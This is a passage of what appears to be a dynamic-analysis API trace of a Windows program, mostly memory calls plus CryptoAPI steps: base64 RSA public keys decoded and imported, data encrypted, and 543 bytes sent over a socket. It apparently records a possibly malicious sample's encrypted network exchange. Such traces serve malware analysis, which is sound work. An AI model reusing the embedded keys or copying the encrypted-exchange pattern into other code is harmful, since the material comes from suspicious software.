0x3d800bb [0135.529] malloc (_Size=0x7) returned 0x3f4bf48 [0135.529] free (_Block=0x0) [0135.529] free (_Block=0x0) [0135.529] memchr (_Buf=0x3d800bc, _Val=32, _MaxCount=0x8) returned 0x0 [0135.529] malloc (_Size=0x9) returned 0x3648da0 [0135.529] free (_Block=0x0) [0135.529] free (_Block=0x0) [0135.529] CryptStringToBinaryA (in: pszString="MIGJAoGBAL8eQWBwCI6xwkw7AyK9I6y+42Ffz9f3pHdLPS2KzlEF+RSV0k7/cwFVxDXRgUe0/1dhCKVC+vNL85ESXMqETVJXnr/HGpWI2gFMP7e/Qw1J/TzSFNIVjgTeCzVyB8WH8wUwn1fOfGpHqiEPcVXRCjyRsdXVBY2UtxJRIiVxAYv9AgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fa88, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fa88, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0135.529] malloc (_Size=0x8c) returned 0x6066d8 [0135.529] free (_Block=0x0) [0135.529] CryptStringToBinaryA (in: pszString="MIGJAoGBAL8eQWBwCI6xwkw7AyK9I6y+42Ffz9f3pHdLPS2KzlEF+RSV0k7/cwFVxDXRgUe0/1dhCKVC+vNL85ESXMqETVJXnr/HGpWI2gFMP7e/Qw1J/TzSFNIVjgTeCzVyB8WH8wUwn1fOfGpHqiEPcVXRCjyRsdXVBY2UtxJRIiVxAYv9AgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x6066d8, pcbBinary=0x339fa88, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x6066d8, pcbBinary=0x339fa88, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0135.529] malloc (_Size=0x8c) returned 0x606770 [0135.529] free (_Block=0x0) [0135.530] free (_Block=0x0) [0135.530] free (_Block=0x6066d8) [0135.530] free (_Block=0x3648c98) [0135.530] free (_Block=0x3f4c098) [0135.530] free (_Block=0x3f4bf48) [0135.530] free (_Block=0x3648da0) [0135.530] free (_Block=0x3e22278) [0135.530] memchr (_Buf=0x3648e78, _Val=32, _MaxCount=0xb) returned 0x0 [0135.530] malloc (_Size=0xc) returned 0x3648ef0 [0135.530] free (_Block=0x0) [0135.530] malloc (_Size=0x40) returned 0x3e22548 [0135.530] free (_Block=0x0) [0135.530] free (_Block=0x0) [0135.530] free (_Block=0x3648ef0) [0135.530] free (_Block=0x3e22548) [0135.530] memchr (_Buf=0x3d80210, _Val=32, _MaxCount=0x1e) returned 0x3d8021a [0135.530] malloc (_Size=0xb) returned 0x3648c98 [0135.531] free (_Block=0x0) [0135.531] malloc (_Size=0x40) returned 0x3e224b8 [0135.531] free (_Block=0x0) [0135.531] free (_Block=0x0) [0135.531] memchr (_Buf=0x3d8021b, _Val=32, _MaxCount=0x13) returned 0x3d8021e [0135.531] malloc (_Size=0x4) returned 0x3f4c028 [0135.531] free (_Block=0x0) [0135.531] free (_Block=0x0) [0135.531] memchr (_Buf=0x3d8021f, _Val=32, _MaxCount=0xf) returned 0x3d80225 [0135.531] malloc (_Size=0x7) returned 0x3f4bf48 [0135.531] free (_Block=0x0) [0135.531] free (_Block=0x0) [0135.531] memchr (_Buf=0x3d80226, _Val=32, _MaxCount=0x8) returned 0x0 [0135.531] malloc (_Size=0x9) returned 0x3648e48 [0135.531] free (_Block=0x0) [0135.531] free (_Block=0x0) [0135.531] free (_Block=0x3648c98) [0135.531] free (_Block=0x3f4c028) [0135.531] free (_Block=0x3f4bf48) [0135.531] free (_Block=0x3648e48) [0135.531] free (_Block=0x3e224b8) [0135.531] memchr (_Buf=0x3defa90, _Val=32, _MaxCount=0x40) returned 0x0 [0135.531] malloc (_Size=0x41) returned 0x3def900 [0135.531] free (_Block=0x0) [0135.531] malloc (_Size=0x40) returned 0x3e22110 [0135.531] free (_Block=0x0) [0135.531] free (_Block=0x0) [0135.532] free (_Block=0x3def900) [0135.532] free (_Block=0x3e22110) [0135.532] memchr (_Buf=0x3defc70, _Val=32, _MaxCount=0x40) returned 0x0 [0135.532] malloc (_Size=0x41) returned 0x3defc20 [0135.532] free (_Block=0x0) [0135.532] malloc (_Size=0x40) returned 0x3e22110 [0135.532] free (_Block=0x0) [0135.532] free (_Block=0x0) [0135.532] free (_Block=0x3defc20) [0135.532] free (_Block=0x3e22110) [0135.532] memchr (_Buf=0x3e22788, _Val=32, _MaxCount=0x3c) returned 0x0 [0135.532] malloc (_Size=0x3d) returned 0x3e221e8 [0135.532] free (_Block=0x0) [0135.532] malloc (_Size=0x40) returned 0x3e22308 [0135.532] free (_Block=0x0) [0135.532] free (_Block=0x0) [0135.532] free (_Block=0x3e221e8) [0135.532] free (_Block=0x3e22308) [0135.532] memchr (_Buf=0x3d80260, _Val=32, _MaxCount=0x1c) returned 0x3d80268 [0135.532] malloc (_Size=0x9) returned 0x3648c68 [0135.532] free (_Block=0x0) [0135.532] malloc (_Size=0x40) returned 0x3e224b8 [0135.532] free (_Block=0x0) [0135.532] free (_Block=0x0) [0135.532] memchr (_Buf=0x3d80269, _Val=32, _MaxCount=0x13) returned 0x3d8026c [0135.532] malloc (_Size=0x4) returned 0x3f4bf58 [0135.533] free (_Block=0x0) [0135.533] free (_Block=0x0) [0135.533] memchr (_Buf=0x3d8026d, _Val=32, _MaxCount=0xf) returned 0x3d80273 [0135.533] malloc (_Size=0x7) returned 0x3f4bf38 [0135.533] free (_Block=0x0) [0135.533] free (_Block=0x0) [0135.533] memchr (_Buf=0x3d80274, _Val=32, _MaxCount=0x8) returned 0x0 [0135.533] malloc (_Size=0x9) returned 0x3648cc8 [0135.533] free (_Block=0x0) [0135.533] free (_Block=0x0) [0135.533] CryptStringToBinaryA (in: pszString="MIGJAoGBALDMSPhpDAao/poIXtcdsluCVjZ80ivhjhfSkHC6brd/CIr6VoJJsJLLq1hpbn1pJfi6XPtcKn2rizDxz9n3jwkyi84pVJg9o4OjH+d6i+1gpHrqmlJk5Zn8rVemuMBQESrBiOZ/B2sRuh7225U9MPh9SxJL9lu3WuROxB/2jbRVAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fa88, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fa88, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0135.533] malloc (_Size=0x8c) returned 0x6066d8 [0135.533] free (_Block=0x0) [0135.533] CryptStringToBinaryA (in: pszString="MIGJAoGBALDMSPhpDAao/poIXtcdsluCVjZ80ivhjhfSkHC6brd/CIr6VoJJsJLLq1hpbn1pJfi6XPtcKn2rizDxz9n3jwkyi84pVJg9o4OjH+d6i+1gpHrqmlJk5Zn8rVemuMBQESrBiOZ/B2sRuh7225U9MPh9SxJL9lu3WuROxB/2jbRVAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x6066d8, pcbBinary=0x339fa88, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x6066d8, pcbBinary=0x339fa88, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0135.533] malloc (_Size=0x8c) returned 0x3d81530 [0135.533] free (_Block=0x0) [0135.533] free (_Block=0x0) [0135.533] free (_Block=0x6066d8) [0135.533] free (_Block=0x3648c68) [0135.533] free (_Block=0x3f4bf58) [0135.533] free (_Block=0x3f4bf38) [0135.533] free (_Block=0x3648cc8) [0135.533] free (_Block=0x3e224b8) [0135.533] memchr (_Buf=0x3f65500, _Val=32, _MaxCount=0x13) returned 0x0 [0135.533] malloc (_Size=0x14) returned 0x3f65440 [0135.533] free (_Block=0x0) [0135.533] malloc (_Size=0x40) returned 0x3e22668 [0135.533] free (_Block=0x0) [0135.533] free (_Block=0x0) [0135.534] free (_Block=0x3f65440) [0135.534] free (_Block=0x3e22668) [0135.534] memchr (_Buf=0x3d802d8, _Val=32, _MaxCount=0x19) returned 0x3d802e2 [0135.534] malloc (_Size=0xb) returned 0x3648cf8 [0135.534] free (_Block=0x0) [0135.534] malloc (_Size=0x40) returned 0x3e225d8 [0135.534] free (_Block=0x0) [0135.534] free (_Block=0x0) [0135.534] memchr (_Buf=0x3d802e3, _Val=32, _MaxCount=0xe) returned 0x0 [0135.534] malloc (_Size=0xf) returned 0x3648e60 [0135.534] free (_Block=0x0) [0135.534] free (_Block=0x0) [0135.534] free (_Block=0x3648cf8) [0135.534] free (_Block=0x3648e60) [0135.534] free (_Block=0x3e225d8) [0135.534] memchr (_Buf=0x3defae0, _Val=32, _MaxCount=0x40) returned 0x0 [0135.534] malloc (_Size=0x41) returned 0x3defc20 [0135.534] free (_Block=0x0) [0135.534] malloc (_Size=0x40) returned 0x3e22308 [0135.534] free (_Block=0x0) [0135.534] free (_Block=0x0) [0135.534] free (_Block=0x3defc20) [0135.534] free (_Block=0x3e22308) [0135.534] memchr (_Buf=0x3defe00, _Val=32, _MaxCount=0x40) returned 0x0 [0135.534] malloc (_Size=0x41) returned 0x3def900 [0135.534] free (_Block=0x0) [0135.534] malloc (_Size=0x40) returned 0x3e22158 [0135.534] free (_Block=0x0) [0135.534] free (_Block=0x0) [0135.534] free (_Block=0x3def900) [0135.534] free (_Block=0x3e22158) [0135.534] memchr (_Buf=0x3624bb8, _Val=32, _MaxCount=0x2c) returned 0x0 [0135.535] malloc (_Size=0x2d) returned 0x36249f8 [0135.535] free (_Block=0x0) [0135.535] malloc (_Size=0x40) returned 0x3e22230 [0135.535] free (_Block=0x0) [0135.535] free (_Block=0x0) [0135.535] free (_Block=0x36249f8) [0135.535] free (_Block=0x3e22230) [0135.535] memchr (_Buf=0x3f65520, _Val=32, _MaxCount=0x17) returned 0x3f65528 [0135.535] malloc (_Size=0x9) returned 0x3648d58 [0135.535] free (_Block=0x0) [0135.535] malloc (_Size=0x40) returned 0x3e221e8 [0135.535] free (_Block=0x0) [0135.535] free (_Block=0x0) [0135.535] memchr (_Buf=0x3f65529, _Val=32, _MaxCount=0xe) returned 0x0 [0135.535] malloc (_Size=0xf) returned 0x3648e18 [0135.535] free (_Block=0x0) [0135.535] free (_Block=0x0) [0135.535] free (_Block=0x3648d58) [0135.535] free (_Block=0x3648e18) [0135.535] free (_Block=0x3e221e8) [0135.535] memchr (_Buf=0x3d80198, _Val=32, _MaxCount=0x1a) returned 0x3d801b0 [0135.535] malloc (_Size=0x19) returned 0x3d801c0 [0135.535] free (_Block=0x0) [0135.535] malloc (_Size=0x40) returned 0x3e22308 [0135.535] free (_Block=0x0) [0135.535] free (_Block=0x0) [0135.535] memchr (_Buf=0x3d801b1, _Val=32, _MaxCount=0x1) returned 0x0 [0135.535] malloc (_Size=0x2) returned 0x3f4c098 [0135.536] free (_Block=0x0) [0135.536] free (_Block=0x0) [0135.536] free (_Block=0x3d801c0) [0135.536] free (_Block=0x3f4c098) [0135.536] free (_Block=0x3e22308) [0135.536] memchr (_Buf=0x3d80378, _Val=32, _MaxCount=0x1c) returned 0x3d80382 [0135.536] malloc (_Size=0xb) returned 0x3648c68 [0135.536] free (_Block=0x0) [0135.536] malloc (_Size=0x40) returned 0x3e224b8 [0135.536] free (_Block=0x0) [0135.536] free (_Block=0x0) [0135.536] memchr (_Buf=0x3d80383, _Val=32, _MaxCount=0x11) returned 0x3d8038a [0135.536] malloc (_Size=0x8) returned 0x3f4c078 [0135.536] free (_Block=0x0) [0135.536] free (_Block=0x0) [0135.536] memchr (_Buf=0x3d8038b, _Val=32, _MaxCount=0x9) returned 0x0 [0135.536] malloc (_Size=0xa) returned 0x3648e48 [0135.536] free (_Block=0x0) [0135.536] free (_Block=0x0) [0135.536] free (_Block=0x3648c68) [0135.536] free (_Block=0x3f4c078) [0135.536] free (_Block=0x3648e48) [0135.536] free (_Block=0x3e224b8) [0135.536] memchr (_Buf=0x3defb30, _Val=32, _MaxCount=0x40) returned 0x0 [0135.536] malloc (_Size=0x41) returned 0x3defc20 [0135.536] free (_Block=0x0) [0135.537] malloc (_Size=0x40) returned 0x3e22500 [0135.537] free (_Block=0x0) [0135.537] free (_Block=0x0) [0135.537] free (_Block=0x3defc20) [0135.537] free (_Block=0x3e22500) [0135.537] memchr (_Buf=0x3defb80, _Val=32, _MaxCount=0x40) returned 0x0 [0135.537] malloc (_Size=0x41) returned 0x3defcc0 [0135.537] free (_Block=0x0) [0135.537] malloc (_Size=0x40) returned 0x3e227d0 [0135.537] free (_Block=0x0) [0135.537] free (_Block=0x0) [0135.537] free (_Block=0x3defcc0) [0135.537] free (_Block=0x3e227d0) [0135.537] memchr (_Buf=0x3648e00, _Val=32, _MaxCount=0xc) returned 0x0 [0135.537] malloc (_Size=0xd) returned 0x3648c50 [0135.537] free (_Block=0x0) [0135.537] malloc (_Size=0x40) returned 0x3e22308 [0135.537] free (_Block=0x0) [0135.537] free (_Block=0x0) [0135.537] free (_Block=0x3648c50) [0135.537] free (_Block=0x3e22308) [0135.537] memchr (_Buf=0x3d803a0, _Val=32, _MaxCount=0x1a) returned 0x3d803a8 [0135.537] malloc (_Size=0x9) returned 0x3648e90 [0135.537] free (_Block=0x0) [0135.537] malloc (_Size=0x40) returned 0x3e221a0 [0135.537] free (_Block=0x0) [0135.537] free (_Block=0x0) [0135.537] memchr (_Buf=0x3d803a9, _Val=32, _MaxCount=0x11) returned 0x3d803b0 [0135.537] malloc (_Size=0x8) returned 0x3f4bf88 [0135.537] free (_Block=0x0) [0135.538] free (_Block=0x0) [0135.538] memchr (_Buf=0x3d803b1, _Val=32, _MaxCount=0x9) returned 0x0 [0135.538] malloc (_Size=0xa) returned 0x3648cf8 [0135.538] free (_Block=0x0) [0135.538] free (_Block=0x0) [0135.538] free (_Block=0x3648e90) [0135.538] free (_Block=0x3f4bf88) [0135.538] free (_Block=0x3648cf8) [0135.538] free (_Block=0x3e221a0) [0135.538] memchr (_Buf=0x3f651e0, _Val=32, _MaxCount=0x12) returned 0x0 [0135.538] malloc (_Size=0x13) returned 0x3f65280 [0135.538] free (_Block=0x0) [0135.538] malloc (_Size=0x40) returned 0x3e224b8 [0135.538] free (_Block=0x0) [0135.538] free (_Block=0x0) [0135.538] free (_Block=0x3f65280) [0135.538] free (_Block=0x3e224b8) [0135.538] memchr (_Buf=0x3e22470, _Val=32, _MaxCount=0x3b) returned 0x3e2247e [0135.538] malloc (_Size=0xf) returned 0x3648db8 [0135.538] free (_Block=0x0) [0135.538] malloc (_Size=0x40) returned 0x3e22398 [0135.538] free (_Block=0x0) [0135.539] free (_Block=0x0) [0135.539] memchr (_Buf=0x3e2247f, _Val=32, _MaxCount=0x2c) returned 0x0 [0135.539] malloc (_Size=0x2d) returned 0x3624838 [0135.539] free (_Block=0x0) [0135.539] free (_Block=0x0) [0135.539] CryptStringToBinaryA (in: pszString="zvHWQ631enILft//HSrJJ49pPfcqjDsz250im7sA7y4=", cchString=0x2c, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fa88, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fa88, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0135.539] malloc (_Size=0x20) returned 0x3d803f0 [0135.539] free (_Block=0x0) [0135.539] CryptStringToBinaryA (in: pszString="zvHWQ631enILft//HSrJJ49pPfcqjDsz250im7sA7y4=", cchString=0x2c, dwFlags=0x6, pbBinary=0x3d803f0, pcbBinary=0x339fa88, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d803f0, pcbBinary=0x339fa88, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0135.539] malloc (_Size=0x20) returned 0x3d80418 [0135.539] free (_Block=0x0) [0135.539] free (_Block=0x0) [0135.539] free (_Block=0x3d803f0) [0135.539] free (_Block=0x3648db8) [0135.539] free (_Block=0x3624838) [0135.539] free (_Block=0x3e22398) [0135.539] memchr (_Buf=0x3648d40, _Val=32, _MaxCount=0xa) returned 0x3648d46 [0135.539] malloc (_Size=0x7) returned 0x3f4c008 [0135.539] free (_Block=0x0) [0135.539] malloc (_Size=0x40) returned 0x3e227d0 [0135.540] free (_Block=0x0) [0135.540] free (_Block=0x0) [0135.540] memchr (_Buf=0x3648d47, _Val=32, _MaxCount=0x3) returned 0x0 [0135.540] malloc (_Size=0x4) returned 0x3f4bf18 [0135.540] free (_Block=0x0) [0135.540] free (_Block=0x0) [0135.540] free (_Block=0x3f4c008) [0135.540] free (_Block=0x3f4bf18) [0135.540] free (_Block=0x3e227d0) [0135.540] memchr (_Buf=0x3f65380, _Val=32, _MaxCount=0x14) returned 0x0 [0135.540] malloc (_Size=0x15) returned 0x3f652c0 [0135.540] free (_Block=0x0) [0135.540] malloc (_Size=0x40) returned 0x3e22110 [0135.540] free (_Block=0x0) [0135.540] free (_Block=0x0) [0135.540] free (_Block=0x3f652c0) [0135.540] free (_Block=0x3e22110) [0135.540] memchr (_Buf=0x60bbf0, _Val=32, _MaxCount=0x69) returned 0x60bc02 [0135.540] malloc (_Size=0x13) returned 0x3f654a0 [0135.540] free (_Block=0x0) [0135.540] malloc (_Size=0x40) returned 0x3e22500 [0135.540] free (_Block=0x0) [0135.540] free (_Block=0x0) [0135.540] memchr (_Buf=0x60bc03, _Val=32, _MaxCount=0x56) returned 0x0 [0135.540] malloc (_Size=0x57) returned 0x60ef88 [0135.540] free (_Block=0x0) [0135.540] free (_Block=0x0) [0135.540] free (_Block=0x3f654a0) [0135.541] free (_Block=0x60ef88) [0135.541] free (_Block=0x3e22500) [0135.541] memchr (_Buf=0x3f653c0, _Val=32, _MaxCount=0x10) returned 0x0 [0135.541] malloc (_Size=0x11) returned 0x3f65440 [0135.541] free (_Block=0x0) [0135.541] malloc (_Size=0x40) returned 0x3e22620 [0135.541] free (_Block=0x0) [0135.541] free (_Block=0x0) [0135.541] free (_Block=0x3f65440) [0135.541] free (_Block=0x3e22620) [0135.541] memchr (_Buf=0x3d803c8, _Val=32, _MaxCount=0x19) returned 0x3d803d2 [0135.541] malloc (_Size=0xb) returned 0x3648ce0 [0135.541] free (_Block=0x0) [0135.541] malloc (_Size=0x40) returned 0x3e22278 [0135.541] free (_Block=0x0) [0135.541] free (_Block=0x0) [0135.541] memchr (_Buf=0x3d803d3, _Val=32, _MaxCount=0xe) returned 0x0 [0135.541] malloc (_Size=0xf) returned 0x3648cc8 [0135.541] free (_Block=0x0) [0135.541] free (_Block=0x0) [0135.541] free (_Block=0x3648ce0) [0135.541] free (_Block=0x3648cc8) [0135.541] free (_Block=0x3e22278) [0135.541] memchr (_Buf=0x3def9f0, _Val=32, _MaxCount=0x40) returned 0x0 [0135.541] malloc (_Size=0x41) returned 0x3defc20 [0135.542] free (_Block=0x0) [0135.542] malloc (_Size=0x40) returned 0x3e22230 [0135.542] free (_Block=0x0) [0135.542] free (_Block=0x0) [0135.542] free (_Block=0x3defc20) [0135.542] free (_Block=0x3e22230) [0135.542] memchr (_Buf=0x3defe50, _Val=32, _MaxCount=0x40) returned 0x0 [0135.542] malloc (_Size=0x41) returned 0x3def900 [0135.542] free (_Block=0x0) [0135.542] malloc (_Size=0x40) returned 0x3e22110 [0135.542] free (_Block=0x0) [0135.542] free (_Block=0x0) [0135.542] free (_Block=0x3def900) [0135.542] free (_Block=0x3e22110) [0135.542] memchr (_Buf=0x3624870, _Val=32, _MaxCount=0x2c) returned 0x0 [0135.542] malloc (_Size=0x2d) returned 0x3624838 [0135.542] free (_Block=0x0) [0135.542] malloc (_Size=0x40) returned 0x3e22350 [0135.542] free (_Block=0x0) [0135.542] free (_Block=0x0) [0135.542] free (_Block=0x3624838) [0135.542] free (_Block=0x3e22350) [0135.542] memchr (_Buf=0x3f653e0, _Val=32, _MaxCount=0x17) returned 0x3f653e8 [0135.542] malloc (_Size=0x9) returned 0x3648e48 [0135.542] free (_Block=0x0) [0135.543] malloc (_Size=0x40) returned 0x3e224b8 [0135.543] free (_Block=0x0) [0135.543] free (_Block=0x0) [0135.543] memchr (_Buf=0x3f653e9, _Val=32, _MaxCount=0xe) returned 0x0 [0135.543] malloc (_Size=0xf) returned 0x3648e60 [0135.543] free (_Block=0x0) [0135.543] free (_Block=0x0) [0135.543] free (_Block=0x3648e48) [0135.543] free (_Block=0x3648e60) [0135.543] free (_Block=0x3e224b8) [0135.543] free (_Block=0x605a18) [0135.543] free (_Block=0x60dd38) [0135.543] free (_Block=0x3f61360) [0135.543] free (_Block=0x3d80238) [0135.543] free (_Block=0x3defa40) [0135.543] free (_Block=0x3df0080) [0135.543] free (_Block=0x3e22428) [0135.543] free (_Block=0x3d800d0) [0135.543] free (_Block=0x3e223e0) [0135.543] free (_Block=0x3d801e8) [0135.543] free (_Block=0x3d80460) [0135.543] free (_Block=0x3d80328) [0135.543] free (_Block=0x3e22080) [0135.543] free (_Block=0x3648920) [0135.544] free (_Block=0x60dd68) [0135.544] free (_Block=0x60b0e0) [0135.544] free (_Block=0x3648680) [0135.544] free (_Block=0x3d80350) [0135.544] free (_Block=0x3defbd0) [0135.544] free (_Block=0x3df0030) [0135.544] free (_Block=0x3e220c8) [0135.544] free (_Block=0x3d800a8) [0135.544] free (_Block=0x3648e78) [0135.544] free (_Block=0x3d80210) [0135.544] free (_Block=0x3defa90) [0135.544] free (_Block=0x3defc70) [0135.544] free (_Block=0x3e22788) [0135.544] free (_Block=0x3d80260) [0135.544] free (_Block=0x3f65500) [0135.544] free (_Block=0x3d802d8) [0135.544] free (_Block=0x3defae0) [0135.544] free (_Block=0x3defe00) [0135.544] free (_Block=0x3624bb8) [0135.544] free (_Block=0x3f65520) [0135.544] free (_Block=0x3d80198) [0135.544] free (_Block=0x3d80378) [0135.544] free (_Block=0x3defb30) [0135.544] free (_Block=0x3defb80) [0135.545] free (_Block=0x3648e00) [0135.545] free (_Block=0x3d803a0) [0135.545] free (_Block=0x3f651e0) [0135.545] free (_Block=0x3e22470) [0135.545] free (_Block=0x3648d40) [0135.545] free (_Block=0x3f65380) [0135.545] free (_Block=0x60bbf0) [0135.545] free (_Block=0x3f653c0) [0135.545] free (_Block=0x3d803c8) [0135.545] free (_Block=0x3def9f0) [0135.545] free (_Block=0x3defe50) [0135.545] free (_Block=0x3624870) [0135.545] free (_Block=0x3f653e0) [0135.545] free (_Block=0x3df00e0) [0135.545] free (_Block=0x60e6c0) [0135.545] malloc (_Size=0x10) returned 0x3648e18 [0135.545] free (_Block=0x0) [0135.546] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648e18 | out: pbBuffer=0x3648e18) returned 1 [0135.546] malloc (_Size=0x40) returned 0x3e22350 [0135.546] free (_Block=0x0) [0135.546] malloc (_Size=0x104) returned 0x3d815c8 [0135.546] free (_Block=0x3e22350) [0135.546] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x606770, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x339fa44, pcbStructInfo=0x339fa1c | out: pvStructInfo=0x339fa44, pcbStructInfo=0x339fa1c) returned 1 [0135.552] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa44, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa40 | out: phKey=0x339fa40*=0x432b78) returned 1 [0135.553] malloc (_Size=0x80) returned 0x60a2d0 [0135.553] free (_Block=0x0) [0135.559] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x60a2d0*, pdwDataLen=0x339fa10*=0x56, dwBufLen=0x80 | out: pbData=0x60a2d0*, pdwDataLen=0x339fa10*=0x80) returned 1 [0135.560] CryptDestroyKey (hKey=0x432b78) returned 1 [0135.561] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fae0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fadc | out: phKey=0x339fadc*=0x4328f8) returned 1 [0135.561] CryptSetKeyParam (hKey=0x4328f8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0135.561] malloc (_Size=0x3a) returned 0x3e22548 [0135.561] free (_Block=0x0) [0135.561] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f9f0*, pdwDataLen=0x339f954*=0x10, dwBufLen=0x10 | out: pbData=0x339f9f0*, pdwDataLen=0x339f954*=0x10) returned 1 [0135.562] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f9f0*, pdwDataLen=0x339f954*=0x10, dwBufLen=0x10 | out: pbData=0x339f9f0*, pdwDataLen=0x339f954*=0x10) returned 1 [0135.562] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f9f0*, pdwDataLen=0x339f954*=0x10, dwBufLen=0x10 | out: pbData=0x339f9f0*, pdwDataLen=0x339f954*=0x10) returned 1 [0135.562] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f9f0*, pdwDataLen=0x339f954*=0x10, dwBufLen=0x10 | out: pbData=0x339f9f0*, pdwDataLen=0x339f954*=0x10) returned 1 [0135.562] CryptDestroyKey (hKey=0x4328f8) returned 1 [0135.562] malloc (_Size=0x100) returned 0x3d81e60 [0135.562] free (_Block=0x0) [0135.562] free (_Block=0x0) [0135.562] free (_Block=0x3e22548) [0135.562] free (_Block=0x60a2d0) [0135.562] free (_Block=0x3d815c8) [0135.562] free (_Block=0x3648e18) [0135.562] malloc (_Size=0xba) returned 0x3d80460 [0135.562] free (_Block=0x0) [0135.562] malloc (_Size=0x202) returned 0x3594d18 [0135.562] free (_Block=0x0) [0135.562] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339fb2c, MessageSeqNo=0x0 | out: pMessage=0x339fb2c) returned 0x0 [0135.562] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0135.563] free (_Block=0x3594d18) [0135.563] free (_Block=0x3d80460) [0135.563] free (_Block=0x3d81e60) [0135.563] GetTickCount () returned 0x1162d70 [0135.563] malloc (_Size=0x10) returned 0x3648d10 [0135.563] free (_Block=0x0) [0135.563] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648d10*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0135.563] free (_Block=0x3648d10) [0135.563] GetTickCount () returned 0x1162d70 [0135.563] malloc (_Size=0x10) returned 0x3648e48 [0135.563] free (_Block=0x0) [0135.563] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e48*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0135.758] free (_Block=0x3648e48) [0135.758] GetTickCount () returned 0x1162e2c [0135.758] free (_Block=0x3f4c058) [0135.758] malloc (_Size=0x10) returned 0x3648f20 [0135.758] free (_Block=0x0) [0135.758] malloc (_Size=0x10) returned 0x3648f38 [0135.758] free (_Block=0x0) [0135.758] malloc (_Size=0x50) returned 0x3d9aae8 [0135.758] free (_Block=0x3648f38) [0135.758] malloc (_Size=0x150) returned 0x3d81010 [0135.758] free (_Block=0x3d9aae8) [0135.758] malloc (_Size=0x550) returned 0x3df00e0 [0135.758] free (_Block=0x3d81010) [0135.758] malloc (_Size=0x1550) returned 0x3f68010 [0135.759] free (_Block=0x3df00e0) [0135.759] malloc (_Size=0x5550) returned 0x348c1b8 [0135.759] free (_Block=0x3f68010) [0135.760] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x4, pbBuffer=0x339fc3c | out: pbBuffer=0x339fc3c) returned 1 [0135.760] free (_Block=0x348c1b8) [0135.760] free (_Block=0x3648f20) [0135.760] free (_Block=0x0) [0135.760] free (_Block=0x0) [0135.760] SetEvent (hEvent=0x3a4) returned 1 [0135.760] malloc (_Size=0x34) returned 0x36241b0 [0135.760] malloc (_Size=0x338) returned 0x3624c18 [0135.760] malloc (_Size=0x80) returned 0x609c70 [0135.760] free (_Block=0x0) [0135.760] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x609c70 | out: pbBuffer=0x609c70) returned 1 [0135.760] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f858, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f854 | out: phKey=0x339f854*=0x432bb8) returned 1 [0135.767] CryptExportKey (in: hKey=0x432bb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f4b4, pdwDataLen=0x339f49c | out: pbData=0x339f4b4*, pdwDataLen=0x339f49c*=0x90) returned 1 [0135.767] free (_Block=0x609c70) [0135.767] CryptBinaryToStringA (in: pbBinary=0x3e64430, cbBinary=0x14, dwFlags=0x4000000c, pszString=0x0, pcchString=0x339fb5c | out: pszString=0x0, pcchString=0x339fb5c) returned 1 [0135.767] malloc (_Size=0x29) returned 0x3624ad8 [0135.767] free (_Block=0x0) [0135.767] CryptBinaryToStringA (in: pbBinary=0x3e64430, cbBinary=0x14, dwFlags=0x4000000c, pszString=0x3624ad8, pcchString=0x339fb5c | out: pszString="8a63e4cc86e4aff54e07af9d2340dfdfb8674312", pcchString=0x339fb5c) returned 1 [0135.767] malloc (_Size=0x10) returned 0x3648ec0 [0135.767] free (_Block=0x0) [0135.767] malloc (_Size=0x10) returned 0x3648d70 [0135.767] free (_Block=0x0) [0135.767] malloc (_Size=0x38) returned 0x3624670 [0135.768] free (_Block=0x3648d70) [0135.768] malloc (_Size=0x8) returned 0x3f4c038 [0135.768] free (_Block=0x0) [0135.768] malloc (_Size=0x10) returned 0x3648e90 [0135.768] free (_Block=0x0) [0135.768] malloc (_Size=0x50) returned 0x3d9a9e0 [0135.768] free (_Block=0x3648e90) [0135.768] malloc (_Size=0x150) returned 0x3d80eb8 [0135.768] free (_Block=0x3d9a9e0) [0135.768] malloc (_Size=0x550) 